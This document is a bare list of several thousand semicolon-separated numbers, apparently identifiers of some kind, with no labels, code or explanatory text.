81284;81333;81334;81335;81336;81932;81337;81933;81934;81935;81937;81936;81938;81939;81940;81942;81941;81943;82315;81944;82316;82317;82318;82320;82319;82321;82323;82322;82324;82326;82325;82327;82329;82328;82330;82331;82332;82333;82334;82336;82335;82337;82338;82339;82340;82341;82342;82343;82345;82344;82347;82346;82348;82349;82350;82351;82352;82354;82353;82355;82356;82358;82357;82360;82359;82361;82362;82364;82363;82365;82366;82367;82368;82369;82370;82371;82372;82373;82375;82374;82376;82377;82378;82379;82381;82380;82382;82383;82384;82386;82385;82387;82388;82389;82390;82391;82392;82393;82395;82394;82396;82397;82398;82400;82399;82401;82402;82403;82404;82405;82406;82407;82408;82409;82410;82411;82412;82413;82414;82416;82415;82418;82417;82419;82420;82422;82421;82446;82447;82448;82449;82484;82450;82451;82452;82453;82454;82455;82456;82457;82458;82459;82486;82485;82558;82559;82560;82561;82562;82563;82617;82618;82633;82685;82684;82686;82736;82738;82737;83097;83096;83098;83099;83100;83102;83101;83103;83104;83155;83157;83156;83158;83169;83170;83244;83243;83245;83246;83247;83248;83249;83254;83250;83274;83275;83276;83284;83329;64561;64560;65982;66392;73226;80913;80914;81495;32324;51359;11652;20093;64490;11653;14324;19473;15651;49792;14344;36074;42262;72094;47860;47861;62787;62788;26010;73474;73475;73476;73477;73478;73479;73481;73480;73482;73483;73484;73473;86674;10635;129355;129359;84796;93845;86874;93828;87725;91765;93609;95540;96486;99670;125735;104437;121191;129062;129360;87726;72713;93719;93739;93829;91766;93788;93610;95632;95541;96487;105076;125732;121422;129356;129353;128879;131289;133679;148830;138099;141203;142219;84797;93740;93810;93718;105077;125730;121394;128973;129501;132051;128974;96488;133682;138101;148833;141205;142220;148829;149002;152112;157853;154939;157911;105078;157461;128876;129358;129352;132054;105079;133678;148834;138103;141198;142216;148828;149030;152111;154973;157855;157467;157921;125731;133681;148835;138102;141204;148827;149238;152115;157857;154937;129052;128878;157464;132050;149031;152117;157856;154940;157462;157909;148831;141202;142221;148826;154635;152114;157858;157919;157468;157459;157920;63147;157460;64932;72709;63148;64933;72710;63149;64934;72711;65731;63150;65732;64935;72373;72374;72712;79826;129354;121190;84798;93846;87210;87727;87728;91767;93616;95633;93611;96489;122258;129051;128975;129357;132079;133680;138100;64502;130626;63268;140188;130627;10562;49778;18248;17688;18370;153617;157126;87922;95924;25702;31732;31733;42871;70397;70398;83953;87923;83954;32397;22046;84046;73186;73187;70396;73185;73183;111531;153891;155446;139744;155017;73184;157872;81247;127116;127117;128416;139732;148958;150864;139745;153460;29900;25089;25091;73225;81246;73832;76579;79123;82529;90835;91991;140658;73224;91992;111532;141105;100784;130271;135972;135181;136667;143116;146620;146619;126824;125779;125780;125781;126825;134762;152042;145262;150860;87955;87989;97212;97213;66318;67119;68933;66319;67120;72729;73833;76145;81106;81422;82620;85160;88624;97417;97352;100572;110813;127115;141833;144970;148261;154721;72730;86311;93720;90424;76118;73834;81815;83735;85402;73830;141779;141778;77477;95469;152041;95470;124366;70195;44986;69955;70785;148846;57713;73835;79234;73831;156024;156023;57728;69915;69916;103529;102355;100131;100130;42290;61719;65942;50986;72349;65580;72216;72204;72186;87500;89940;91310;100125;110272;137648;136668;144450;91500;73854;76580;95812;73852;73853;74038;136666;91501;65738;65737;72587;72588;76119;76120;73137;73836;73136;72622;72621;76146;77558;79215;102496;70412;70413;59110;58582;59111;59112;58581;38654;11313;26967;10136;45627;66634;22256;25683;31640;14804;11577;11570;66633;10137;20987;19252;14826;14827;15823;14825;19310;100597;100595;100596;10138;10139;34849;54604;62125;32399;10422;60033;60034;60035;64451;12218;66717;25993;126244;14243;51998;53448;53449;58965;62358;63267;72370;72215;72878;73305;65899;66201;66390;66841;70293;71500;76148;73804;76405;77183;78063;78109;80121;84164;91856;93195;20255;19233;19949;31346;45438;18035;65900;18430;18644;47902;72618;73568;62368;72212;38207;26197;45579;72217;13842;14379;19585;21728;11910;19600;21116;25118;10620;10382;10346;24785;26067;15867;20812;24909;24910;25928;18541;11890;18290;10141;56820;11335;93911;51839;51838;102083;102082;73149;104667;101114;85380;55133;55134;140132;127910;108712;104668;136339;122582;123752;59453;33392;136338;138175;138214;138174;138177;138176;138216;138215;138336;138337;139059;139060;139061;136968;139034;140792;141009;141363;141815;142456;142740;142901;143156;143588;144809;145448;146207;146271;146586;147192;147812;148298;148565;148693;148939;149090;149476;150138;150281;150721;150868;150999;151810;152004;152232;152685;155601;153368;153369;153450;153666;153839;153995;154327;154738;155653;156011;156077;156545;156916;157369;157881;158097;158583;159037;136969;112153;112152;71176;88955;12107;49675;93231;93226;77910;72417;56632;56448;154998;56633;109915;109916;72879;140655;97994;139615;125154;68880;68879;130091;101027;100551;105109;108813;51351;51352;97085;93227;92361;56998;93232;153488;139231;140517;138602;153444;138603;151623;136664;84669;136665;93228;93233;133306;104497;81261;74250;76404;74251;135177;62033;144813;118095;144792;50346;85381;92219;92220;93229;146449;147727;93234;151600;153440;154992;156101;157430;151591;158785;147724;151593;148481;147723;148462;150362;122256;158784;148472;139483;138523;137728;136617;142713;141452;146417;147726;147725;149384;156113;129056;136618;129057;88700;131186;122927;122546;92413;92414;92415;92362;92416;92374;92370;92376;92375;112279;131023;92363;92417;92371;92364;92418;92419;92420;92365;92421;92366;92377;92422;92423;92424;92372;92425;92426;92427;92367;92428;92429;92430;92368;92431;92432;92373;132101;92369;92433;92434;92435;92436;92437;92438;92439;93235;93230;70942;108521;130432;103857;112114;30213;39420;134714;117335;123797;30212;99763;71175;71077;59732;59731;30058;22926;15763;11972;90925;11623;16179;18424;64377;80889;93222;10473;31345;34471;34470;11133;10735;121039;142960;70941;10359;11124;11125;65901;11735;65902;141366;72905;141341;141340;156941;72904;31719;31718;59108;11481;52050;54607;70682;11303;11686;11685;31647;31786;46885;85513;11519;24813;11809;11552;36100;36101;10947;11937;13651;11039;10888;12255;11622;11609;76496;76497;76498;18008;67124;67125;67126;67127;67128;73962;67123;27597;21235;23641;56564;56565;40419;46182;46183;51974;51090;64930;44383;30055;44382;46817;64931;63638;72334;67243;88931;126648;126506;122243;122363;81777;65914;154963;135921;76512;65915;81778;149642;48201;71212;15566;18059;11924;11544;35556;23934;18691;20210;22364;47128;77983;22527;18690;70023;35749;34095;36050;24874;58907;14257;51852;15639;35090;13843;15586;35953;22049;11337;88934;19776;69051;16170;39537;64096;42842;54842;39538;55410;52051;93527;19718;17604;18065;18244;18813;14668;15432;57768;57919;62743;62997;63548;58005;58348;58897;59408;60042;61714;62579;62588;17218;17603;18064;18243;18689;19719;29744;58898;59407;60043;61715;20842;24701;24875;25349;21225;21322;21627;22095;22369;23633;23930;62580;62589;62744;62998;63549;70714;70947;63550;64722;65130;65805;66479;66992;69268;69992;63551;64723;65131;65806;28329;30209;31652;31864;33393;33505;34268;34766;35218;35251;25735;25820;26068;27521;66480;66993;69269;69993;70948;70715;71346;72330;73098;73768;74439;76762;77904;77498;70716;70949;71347;72331;73099;73769;74440;33522;38200;39372;40351;40478;40930;42305;43173;44658;45392;34267;34767;35219;35581;35778;36045;36215;76763;77905;77499;78472;79664;80522;82038;82039;81520;82502;83438;84579;77500;77906;78473;79665;39853;47123;47781;49145;50084;50382;51120;52530;52766;53593;40479;40931;42306;43174;44659;45393;80523;103569;50085;50383;51121;52531;52767;53594;55287;45133;55901;56037;56119;56334;56750;57769;58006;58349;45403;47124;47782;47829;49146;81521;82040;82041;82503;82583;82998;83439;85274;84580;85688;85385;86070;86763;87475;88753;88460;89874;90791;84581;85275;57316;53595;85386;85689;86418;86071;86764;87476;88461;88754;89875;90792;91546;92754;95474;93661;94959;95885;96775;97638;90793;99630;91547;92755;117941;93662;94232;55288;95437;94960;95475;95886;96776;97639;99125;99126;100126;99631;100809;102358;103679;105212;104637;106302;108586;108755;108376;109868;110809;100127;99632;102359;100810;104638;103680;105040;105213;105616;106303;106561;108377;108587;108756;55902;56038;56120;109869;110810;117670;117920;117293;119606;118395;121477;122194;123134;122950;126001;126071;126624;125363;128530;110811;117668;117294;117921;119604;118397;122233;121512;123012;122948;125361;125877;126072;126002;128061;126622;128062;138083;139063;139787;128528;131767;130172;132714;132711;133677;135201;134407;135274;136357;137051;128525;129101;56335;130170;131773;132709;132715;133693;134405;135202;135276;136404;137049;138085;138445;149255;148775;150122;151574;152414;153090;153877;139074;139791;140734;141570;142913;144770;144278;142611;146424;145446;146781;148012;139040;56751;139789;140732;141571;142910;142613;144282;144771;145465;146425;146780;148014;148767;149281;150802;150119;57351;151571;152635;152412;153105;153878;155915;154817;158657;156603;157446;153089;158692;153881;155917;154819;157443;156606;158654;14197;158694;12642;15408;15712;14181;14728;16085;40362;20862;14192;57770;57920;62745;63552;62999;58007;58350;59410;58899;61716;60044;62590;62581;17605;19694;19269;58900;59409;20735;60045;24748;61717;25350;29743;21628;22096;22370;23635;23929;62591;62582;62746;70717;63000;71044;63553;64724;65191;64725;65192;65807;65808;66481;66482;66994;66995;69270;69271;69994;31193;32134;33563;34294;34819;35287;35977;39493;40664;45110;25754;25837;28226;69995;70718;71045;71348;72332;73100;73770;76764;74441;77501;77907;44111;50384;51122;45394;44961;47125;47783;49147;50086;47784;53596;55289;56039;55886;56121;56752;57771;58008;58351;50087;50385;51123;49148;52532;52768;76765;77502;77908;78474;79666;81522;80524;82504;83464;84582;87110;95476;96269;96905;97663;99968;105044;101772;105507;109946;108519;111044;55887;56040;56122;111981;118593;117939;122402;121600;123509;123507;125359;125950;126218;128775;126704;128972;128970;138096;139185;129390;139870;130365;131956;133691;132774;135413;136359;137087;56336;138589;139318;148773;149257;149528;151613;150157;153111;152452;154060;139868;141775;143426;143058;144284;144854;145468;146783;148110;148395;56753;57352;152503;152633;154059;155919;156195;156610;157907;154875;158069;158653;11590;158929;16172;12016;35600;50001;50002;55801;58435;59980;59643;63643;82828;90510;79638;97833;100464;103876;57033;138554;90149;72836;72837;72832;72833;72834;72835;74496;33950;72780;10356;12229;12204;62758;51835;51834;55532;51836;11018;11314;62028;10357;11161;10939;10934;33395;11163;18027;29314;15465;10143;10142;11159;11808;11835;22319;15464;10885;11308;10673;125313;10862;11067;108593;11214;11870;91827;10674;108761;64784;69482;10144;11217;10145;108409;73756;10390;10391;102683;16169;10418;21309;10516;10822;11504;108373;49698;49697;49699;49700;62718;18049;66497;62717;21757;18359;11931;72179;20342;20373;20930;68995;72686;72906;81699;22055;64936;56512;21053;20841;19525;19715;21052;21239;19716;20838;29996;16143;14327;53288;12029;21246;25546;11489;25116;11310;11877;11836;22413;18218;11770;14182;14838;11851;17815;30219;17816;17817;17818;17819;17820;17821;17822;17823;17824;17825;17826;17827;17828;17799;17829;17800;32137;17691;17830;17697;17831;17801;17802;17803;17804;17805;17832;25759;29251;17833;34159;42899;17834;57604;62927;17806;17807;17808;17809;25242;29345;34160;35766;42900;17835;46328;46702;47158;48759;49711;50527;57605;17810;58802;59448;62637;62638;62639;63617;65733;66177;68937;70461;71971;71972;57606;58661;59967;59449;62640;62641;62642;63618;65734;68938;66178;88379;70462;71973;71974;73572;73318;76529;77669;84924;85536;86657;86546;86658;87419;88380;89054;90829;90682;90830;91993;91994;93000;93001;93375;93376;94165;94196;95876;95877;99514;99510;101977;101819;104048;103965;106098;106097;17836;109166;109167;111153;111154;118233;66179;88381;68939;70463;71975;71976;73573;73574;76530;77670;99511;86659;78477;88382;80886;85537;82799;82800;85538;84767;85539;85223;86660;86547;86661;87420;88383;89055;90831;90683;90832;91995;91996;93002;93003;93377;93378;94166;95878;94197;95879;99515;99512;101820;101978;104049;103966;106099;106100;109168;109169;111155;111156;118234;121227;124158;126782;132956;130025;138571;135699;141796;145252;88384;87421;89056;90833;90684;90834;91997;91998;93004;93005;93379;93380;94167;94198;95880;95881;99516;99513;101821;101979;104050;106101;103967;109170;106102;111157;109171;111158;118235;121228;124159;126783;130026;132957;83347;135700;138570;141797;145247;148936;154259;151969;156907;36020;17811;17812;17813;17814;34161;17837;111159;118236;111160;121229;124160;130027;126784;132958;135701;138560;141798;148937;145251;154258;151968;21632;156908;61393;10343;64503;14831;14319;17838;96723;96724;96725;96726;99517;99518;101811;96727;96728;99519;96729;99520;133181;71116;124174;124175;138561;11299;29346;46816;61696;83292;83293;83294;83296;83295;86548;90685;83297;96767;96766;96769;96768;96770;96771;99593;101895;103536;106103;111593;111600;138902;138904;138896;138903;138039;138568;138569;141847;138567;145538;154267;148986;138901;32138;46815;34162;34727;88698;52053;52054;16093;10626;14343;19416;71862;91823;11192;15449;15477;17313;11842;25198;17690;24905;57558;10481;17698;10719;64263;129468;147021;18618;146199;154416;154417;63563;49774;63562;71159;66361;73757;30057;66360;150054;49775;49776;61429;71635;64690;61430;60099;65604;71636;154935;150055;150056;157377;150057;153612;10424;10425;16045;73685;73682;73683;73125;73124;153046;35619;35588;41646;42150;20341;20340;33272;15542;10761;122316;12017;10721;10665;10146;65721;108716;108717;11730;20932;20931;11608;108718;110230;148832;10147;83955;110231;25799;88964;11219;86949;88904;90774;89028;92465;97192;97193;99440;96833;108689;110096;118398;120197;120198;123462;121620;126627;128118;130433;138562;139910;142144;149280;148297;150798;157339;157425;154776;71458;47833;88965;25612;10148;70566;70564;112118;103872;102780;103926;103970;127136;92541;102781;110943;110944;14378;119780;10494;11830;43815;10150;42409;118730;43614;10151;10152;11600;11020;15572;18294;18295;18223;18142;97664;97665;100321;76475;95823;11737;72830;104128;12258;11514;11474;70585;81791;100322;11897;11898;11899;81405;81404;102860;81403;102861;62992;63185;62990;62989;62991;63186;63688;90713;90603;96485;90602;29929;29930;29928;31342;15765;140657;15766;58769;15767;19503;58770;19301;18358;49779;102709;102710;102711;102712;102713;67200;118086;118087;29220;29221;66394;29222;29223;29224;29225;10153;10154;10468;19696;28377;31135;31343;10155;19695;100511;10689;10691;10156;10580;10681;10364;12225;12077;10352;90254;10157;58651;64582;50545;50546;14272;11106;50547;84006;119681;25800;18257;25767;12104;44064;11827;11158;44066;12119;119682;65632;17594;15421;33523;34447;60081;34507;60080;60082;21154;70943;10360;10586;149508;17309;127140;127141;127142;127143;127145;127144;127147;127146;127148;127149;127150;127151;127152;127153;127155;127154;127157;127156;127159;127158;127160;127161;127162;127163;127164;127165;127166;127167;127168;127169;127170;127171;127172;127173;127174;127175;127176;127178;127177;127179;127180;127181;127182;127183;127184;127185;127186;127187;127188;127189;127191;127190;127192;127193;127194;127196;127195;127197;127199;127198;127200;127201;127202;127204;127203;127205;127206;127207;127209;127210;127208;127211;127212;127213;127214;127215;127216;127217;127218;127219;127221;127220;127223;127222;127224;127225;127226;127227;127228;127229;127230;127231;127232;127234;127233;127235;127236;127237;127238;127239;127240;127242;127241;127243;127244;127245;127246;127247;127248;127250;127249;127251;127252;127253;127254;127255;127256;127258;127257;127259;127260;127261;127262;127263;127264;127266;127265;127267;127268;127269;127270;127271;127272;127273;127274;127275;127276;127277;127278;127280;127279;127282;127281;127283;127284;127285;127286;127287;127288;127289;127290;127291;127292;127293;127294;127295;127296;127297;127298;127299;127300;127301;127302;127303;127304;127305;127306;127307;127308;127309;127310;127311;127313;127312;127314;127315;127316;127317;127318;127319;127320;127321;127322;127323;127324;127325;127326;127328;127327;127329;127330;127331;127333;127332;127334;127335;127336;127337;127338;127339;127340;127342;127341;127343;127344;127346;127345;127347;127348;127349;127350;127352;127351;127353;127354;127355;127356;127358;127357;127359;127361;127360;127362;127363;127364;127365;127366;127367;127369;127368;127370;127371;127372;127373;127374;127375;127376;127377;127378;127379;127380;127381;127382;127383;127384;127386;127385;127388;127387;127389;127390;127391;127392;127393;127394;127396;127395;127398;127397;127399;127400;127401;127402;127403;127404;127405;127406;127407;127409;127408;127410;127411;127412;127413;127414;127415;127416;127417;127418;127419;127420;127421;127422;127423;127424;127426;127425;127427;127428;127429;127430;127431;127432;127433;127434;127435;127436;127437;127438;127439;127440;127441;127442;127443;127444;127445;127446;127447;127448;127449;127450;127452;127451;127453;127454;127456;127455;127457;127458;128703;127459;128704;128701;128702;128695;128696;128693;128694;128699;128700;128691;128687;128692;128688;128689;128690;128697;128705;128698;129901;129900;129898;129899;129904;129905;129921;129920;129932;129933;129912;129913;129906;129907;129883;129884;129887;129886;129888;129889;129934;129935;129892;129893;129926;129927;129914;129915;129894;129895;129890;129891;129929;129928;129911;129910;129936;129937;130202;130201;129924;129925;129903;129902;129922;129923;129908;129909;129918;129919;129931;129930;129940;129941;129938;129939;129916;129917;129897;129896;131768;131769;131770;131771;131776;131777;131417;131774;131418;131404;131409;131405;131410;131413;131414;131425;131426;131406;131407;131415;131416;131411;131421;131412;131419;131422;131423;131420;131424;131408;132457;132458;132505;132506;132443;132444;132508;132507;132461;132462;132473;132472;132477;132476;132503;132504;132497;132470;132498;132471;132493;132501;132494;132502;132441;132442;132479;132480;132487;132488;132447;132448;132460;132459;132455;132456;132485;132486;132491;132492;132511;132512;132474;132475;132509;132510;132446;132445;132454;132453;132452;132451;132484;132483;132496;132495;132466;132467;132433;132449;132434;132450;132435;132436;132468;132469;132463;132464;132465;132437;132438;132587;132588;132439;132440;132489;132490;132481;132482;132499;132500;132478;133086;133072;133087;133073;133070;133080;133071;133081;133084;133085;133074;133075;133082;133083;133076;133077;133079;134320;134321;134324;134325;134316;134317;135759;135760;135761;135763;135762;135764;134309;134310;134411;134412;134322;134323;134318;134319;134314;134315;134313;134312;134409;134410;134311;136902;136903;136908;136909;136906;136907;136904;136905;136910;136911;137058;138766;138767;138774;138773;138771;138772;138777;138778;138779;138780;138768;138769;138775;138776;138770;140281;140292;140293;140697;140282;140698;141400;141399;141401;141406;141402;140276;141405;140288;140289;140290;140291;140283;140284;140277;140274;140275;140278;141403;141404;141408;141407;140286;140287;140279;140280;140285;143960;143961;143895;143894;143916;143915;143939;143938;143917;143918;143906;143907;143952;143953;143908;143909;143896;143897;143927;143928;143987;143986;143930;143931;143925;143926;143998;143999;143944;143943;143923;143924;143982;143983;143985;143984;143888;143889;143912;143892;143893;143957;143956;143942;143911;143941;144086;144085;143965;143964;143929;143967;143966;143962;143963;144000;144001;143945;143969;143901;143900;143980;143968;143981;143959;143958;143921;143922;143988;143989;143920;143919;143935;143934;143978;143979;143955;143954;144003;144002;143913;143914;143948;143949;143996;143997;143933;143932;144009;144010;143950;143951;143972;143973;143936;143937;143992;143993;144048;144049;145703;145702;143898;143899;143970;143971;143947;143946;143994;143995;144008;144007;143974;143975;143890;143891;143902;143903;143904;143905;144005;144006;144088;144087;143976;143977;143990;143991;143940;147405;147406;147313;147339;147340;147312;147408;147407;147298;147299;147293;147292;147390;147391;147274;147273;147321;147322;147400;147287;147288;147337;147338;147370;147371;147373;147372;147310;147311;147387;147386;147378;147379;147398;147362;147361;147280;147399;147279;147325;147326;147300;147301;147290;147291;147359;149336;147360;147278;147277;147316;147350;149335;147349;147303;147302;147394;147238;147395;147237;147369;147347;147368;147348;149337;147374;149338;147375;147353;147354;147253;147254;147269;147270;147343;147344;147710;147711;147381;147259;147380;147258;147385;147384;147366;147367;147252;147251;147403;147404;147409;147410;147328;147327;147257;147389;147388;147346;147345;147248;147247;147281;147282;147240;147239;147356;147355;147332;147331;147264;147309;147308;147364;147363;147383;147382;147265;147266;147272;147271;147335;147336;147396;147397;147351;147709;147708;147334;147352;147333;147323;147324;147245;147246;147297;147296;147305;147304;147376;147377;147295;147294;147393;147392;147283;147401;147284;147402;147263;147262;147317;147318;147244;147243;147319;147320;147285;147276;147275;147315;147286;147314;147307;147306;147357;147358;147242;147241;147249;147250;147289;147267;147268;147261;147260;147342;147341;154552;154553;154605;154607;154585;154500;154590;154609;154478;154531;154536;154625;154636;154615;154515;154480;154479;154533;154571;154522;154517;154521;154527;154617;154573;154623;154524;154507;154530;154465;154594;154622;154624;154575;154546;154501;154488;154545;154520;154613;154564;154563;154534;154572;154481;154582;154539;154595;154475;154489;154580;154540;154547;154583;154499;154600;154510;154535;154474;154463;154599;154593;154597;154559;154452;154577;154626;154574;154508;154502;154639;154592;154567;154619;154506;154557;154556;154621;154561;154548;154482;154560;154596;154519;154633;154587;154470;154551;154550;154511;154505;154631;154518;154493;154492;154544;154555;154586;154464;154628;154566;154441;154450;154604;154581;154562;154532;154579;154487;154516;154528;154467;154483;154490;154608;154523;154578;154494;154457;154462;154598;154543;154526;154542;154466;154565;154476;154509;154616;154447;154445;154554;154603;154570;154610;154486;154504;154591;154503;154541;154614;154461;154584;154485;154602;154576;154568;154525;154496;154601;154495;154454;154498;154538;154588;154549;154497;154558;154529;154491;154448;154471;154451;154469;154446;154468;154460;154459;154442;154443;154455;154472;154439;154444;154484;154453;154440;154456;154537;154477;56821;36017;49118;11357;11353;11356;42255;11358;15984;42256;11800;150154;107261;107262;107263;107264;58413;58414;58750;118150;105359;118151;118956;127907;134220;66671;61394;73894;66672;73519;71117;77246;78386;107265;86884;122612;132775;106375;106374;41608;124335;124336;16310;16274;149511;136340;10767;11926;12238;10158;10251;11466;66763;66026;66025;66765;66764;21241;21242;21243;147729;149403;147730;147731;148711;57334;57333;11033;42086;53848;17228;17229;57335;10159;10386;110723;20971;20974;23932;25756;25293;35288;19700;21609;118937;118957;118933;119938;143423;140795;154231;154232;147145;144949;151975;154235;157354;110839;47827;11549;46704;46703;42823;11201;11327;10160;72600;15715;72665;10989;10528;10529;142137;142136;20924;11410;47899;27534;54922;27574;10162;12248;47039;47581;47582;23786;10163;69557;23970;72348;53536;53846;62977;62026;62027;55471;55543;55544;77473;77474;12122;65917;71847;65916;66036;66034;66035;33867;43060;48364;48407;51367;54988;56682;57890;63337;66335;71523;31136;34049;34085;33227;25524;65675;65674;56691;56812;12050;36103;74261;20318;18506;29898;12049;40852;40853;20747;33481;25952;50023;25125;62968;62967;47804;47803;36205;21340;23699;23769;23978;12048;65722;45569;58447;66913;72814;58968;23787;62704;62703;70726;83289;58446;66914;58445;50679;56684;56668;66915;65550;65551;88982;32481;11740;10164;10165;58833;58832;87242;25294;40330;60153;38850;38849;11664;20388;26071;26922;10540;10166;10167;25201;81981;97988;107258;111968;122777;135920;138356;83744;121310;86631;121311;88054;90923;91515;95575;84288;95389;19517;97861;71783;10884;10647;38831;43156;73188;57556;64937;67122;64938;21596;155154;15788;149645;14194;11282;12202;11447;31192;11183;59660;59657;59659;59658;149497;117427;103929;103928;119326;142492;142481;83521;72483;82528;133058;146428;151287;157125;133059;63417;122509;138357;145034;146429;149046;152123;158894;72484;84621;87411;94575;96001;97385;100258;102782;105776;103457;111106;72481;157318;158893;122510;126049;133307;134761;138358;145035;149045;152124;155842;158892;87412;90119;93912;94576;95370;96002;97386;100259;102783;105777;103458;111107;11233;10654;34292;95390;95391;34460;74120;74119;11599;11537;15974;15468;22874;44392;44393;17214;11872;26195;35041;59246;59245;59247;69100;59248;109581;11419;27524;27525;20109;11074;21740;26012;31348;26013;26198;33228;12125;77562;77563;153475;153486;77605;35805;11643;35261;111384;111385;110326;103869;21608;103865;103866;103867;104571;104275;103868;104276;10578;57578;66268;67008;57579;57577;57580;57576;57575;149523;74514;74515;74516;74517;74518;74519;74520;74521;74522;74523;74525;74524;74527;74526;74528;74529;74530;74531;74532;74533;74534;74535;74536;74537;74538;74542;74539;74540;74543;74541;74544;74546;74545;74547;74548;74549;74550;74551;74552;74553;74555;74554;74556;74557;74558;74559;74560;74561;74562;74563;74564;74566;74565;74567;74568;74569;74571;74570;74578;74572;74573;74574;74575;74576;74577;74585;74579;74580;74582;74581;74583;74584;74586;74589;74588;74587;74590;74591;74593;74592;74594;74595;74596;74597;74598;74599;74600;74601;74603;74602;74605;74604;74606;74607;74608;74609;74611;74610;74613;74612;74614;74615;74616;74617;74618;74620;74619;74621;74622;74623;74624;74625;74626;74628;74627;74629;74630;74639;74631;74632;74633;74635;74634;74636;74637;74638;74643;74641;74640;74642;74649;74644;74645;74647;74646;74648;74651;74650;74656;74652;74653;74654;74657;74655;74659;74658;74660;74662;74661;74663;74664;74665;74666;74668;74667;74669;74671;74672;74673;74674;74670;74675;74676;74677;74678;74679;74680;74681;74682;74683;74684;74685;74686;74688;74687;74689;74690;74691;74692;74694;74693;74695;74696;74697;74698;74699;74700;74701;74702;74703;74704;74705;74706;74707;74708;74709;74710;74712;74711;74713;74714;74715;74722;74717;74718;74716;74719;74720;74721;74731;74723;74724;74726;74725;74727;74728;74729;74730;74732;74733;74734;74735;74736;74737;74738;74743;74740;74739;74741;74742;74744;74745;74747;74746;74749;74750;74751;74752;74753;74748;74754;74755;74756;74757;74758;74759;74760;74761;74762;74763;74764;74765;74767;74766;74768;74769;74770;74771;74772;74773;74775;74774;74777;74776;74778;74779;74786;74780;74781;74782;74783;74784;74785;74789;74787;74788;74791;74790;74794;74792;74793;74795;74796;74797;74798;74799;74800;74801;74802;74803;74807;74804;74805;74806;74810;74808;74809;74812;74811;74813;74814;74816;74815;74817;74818;74819;74820;74822;74821;74823;74824;74825;74826;74827;74828;74833;74829;74830;74831;74832;74841;74834;74835;74836;74837;74838;74839;74840;74847;74842;74843;74844;74845;74846;74851;74848;74849;74850;74853;74852;74855;74854;74856;74857;74858;74859;74885;74860;74861;74862;74863;74864;74866;74865;74867;74868;74869;74870;74871;74872;74873;74874;74875;74876;74877;74879;74880;74878;74881;74883;74882;74884;74891;74886;74887;74888;74889;74890;74892;74893;74894;74895;74896;74897;74903;74898;74900;74901;74899;74902;74911;74904;74905;74906;74908;74907;74909;74910;74918;74912;74913;74914;74915;74916;74917;74919;74920;74921;74922;74923;74924;74926;74925;74927;74928;74929;74930;74931;74932;74938;74933;74934;74935;74936;74937;74942;74939;74940;74941;74943;74944;74945;74946;74947;74948;74949;74950;74951;74956;74952;74953;74954;74955;74957;74958;74959;74960;74961;74962;74963;74964;74965;74966;74967;74968;74969;74970;74971;74972;74973;74974;74976;74975;74977;74983;74978;74979;74980;74981;74984;74982;74987;74986;74985;75036;74988;74989;74997;74990;74991;74992;74993;74995;74994;74996;75003;74998;75000;74999;75001;75011;75002;75004;75006;75005;75007;75008;75010;75015;75009;75012;75013;75014;75020;75017;75016;75018;75019;75021;75022;75023;75024;75025;75026;75027;75028;75029;75030;75031;75032;75033;75034;75093;75035;75037;75038;75040;75039;75042;75041;75043;75044;75045;75046;75047;75048;75049;75050;75051;75052;75057;75053;75054;75055;75056;75062;75058;75059;75060;75061;75069;75063;75064;75065;75066;75067;75068;75070;75071;75072;75073;75074;75075;75076;75077;75078;75079;75080;75081;75082;75083;75084;75085;75086;75087;75088;75089;75090;75091;75092;75141;75094;75095;75096;75097;75098;75099;75100;75102;75101;75104;75103;75105;75106;75108;75107;75109;75110;75112;75111;75113;75114;75115;75116;75117;75118;75119;75120;75121;75123;75122;75124;75125;75126;75128;75127;75129;75130;75131;75132;75133;75134;75135;75136;75137;75138;75139;75140;75142;75143;75144;75146;75145;75147;75148;75149;75150;75151;75155;75152;75153;75154;75160;75156;75157;75158;75159;75162;75161;75167;75163;75164;75165;75166;75168;75169;75170;75171;75172;75173;75174;75176;75175;75181;75177;75178;75179;75180;75187;75182;75183;75185;75184;75188;75186;75190;75189;75191;75192;75193;75194;75195;75197;75196;75199;75198;75200;75201;75203;75202;75204;75205;75206;75207;75208;75209;75210;75211;75214;75212;75213;75215;75216;75217;75218;75219;75220;75221;75222;75223;75224;75226;75225;75227;75228;75229;75230;75231;75232;75233;75234;75235;75236;75237;75238;75239;75240;75241;75242;75243;75244;75284;75247;75245;75246;75254;75248;75249;75250;75251;75252;75253;75255;75260;75257;75256;75258;75259;75261;75262;75264;75263;75265;75266;75267;75268;75269;75270;75271;75272;75273;75274;75276;75275;75277;75278;75280;75279;75282;75281;75283;75327;75285;75286;75287;75288;75289;75290;75291;75292;75293;75295;75294;75297;75296;75298;75299;75300;75302;75301;75303;75304;75306;75305;75307;75308;75309;75310;75317;75311;75313;75312;75314;75315;75316;75318;75319;75320;75321;75322;75323;75324;75325;75326;75377;75328;75329;75330;75331;75332;75333;75334;75335;75336;75337;75338;75339;75340;75341;75342;75343;75344;75345;75347;75346;75348;75349;75350;75351;75352;75353;75354;75355;75356;75357;75358;75359;75366;75360;75361;75362;75364;75363;75365;75369;75367;75368;75370;75371;75372;75373;75374;75375;75376;75392;75382;75378;75379;75380;75381;75386;75383;75384;75385;75388;75387;76069;76085;76104;76135;75389;76136;76137;76181;76182;76183;75390;76211;76228;76229;76230;76336;76337;76338;76340;76339;75391;76341;76342;76343;76365;76366;76488;76546;76721;76722;76723;76724;76725;76726;76956;76958;76957;76960;76959;76988;77127;77126;77128;77129;77130;77131;77132;77133;77134;77135;77136;77214;77177;77288;75396;77289;77290;77291;77292;77293;77294;77295;77297;77296;77318;77317;77365;77364;77366;77431;77432;77565;77618;77619;77620;77621;77660;77659;77693;77718;77719;77720;77734;77777;77778;77803;77804;77844;77890;77846;77845;77965;77966;77967;78020;78115;78021;75393;78116;75394;78117;78118;78450;78451;78452;78453;75395;78497;78498;78591;78590;78636;78635;75400;75397;78637;78719;78720;78733;78734;78818;78817;78820;78819;78837;78836;75398;75399;79267;79101;79102;79103;79104;79105;79106;79107;79222;79198;79223;79224;79226;79225;79241;79268;79269;79323;79324;79348;79349;79350;79368;79412;79413;79423;75406;75401;79574;79590;79575;79591;79592;79614;79615;79616;79617;75402;79753;79754;79755;75403;79796;79815;79816;79817;79818;79819;79820;79821;79998;79997;79999;80043;80044;80045;80046;80047;80048;80050;80049;75404;80051;80052;80053;80093;80094;80095;75405;80151;80150;80153;80152;80212;80211;75411;75407;80246;80274;80275;80276;80277;80278;80299;80300;80301;75408;75409;75410;75415;75412;75413;80353;75414;80539;81238;81239;81240;81241;81242;81252;81243;80540;81253;81254;81285;81286;81287;81304;81305;80541;81338;80542;81371;81372;81373;81397;81416;81417;81418;81433;81434;81560;81561;80543;81562;81563;81589;81620;81621;81622;81623;80354;81691;81692;81693;81719;81720;81761;81762;81763;81764;